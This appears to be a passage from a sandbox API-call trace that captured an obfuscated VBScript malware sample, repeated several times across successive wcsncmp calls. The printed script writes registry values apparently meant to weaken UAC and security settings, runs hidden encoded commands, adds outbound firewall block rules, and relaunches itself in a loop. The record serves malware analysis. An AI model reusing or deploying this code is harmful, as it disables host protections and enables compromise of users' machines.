WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0226.322] wcsncmp (_String1="le\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0226.322] wcsncmp (_String1="e\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.322] wcsncmp (_String1="\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0226.322] wcsncmp (_String1="\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run 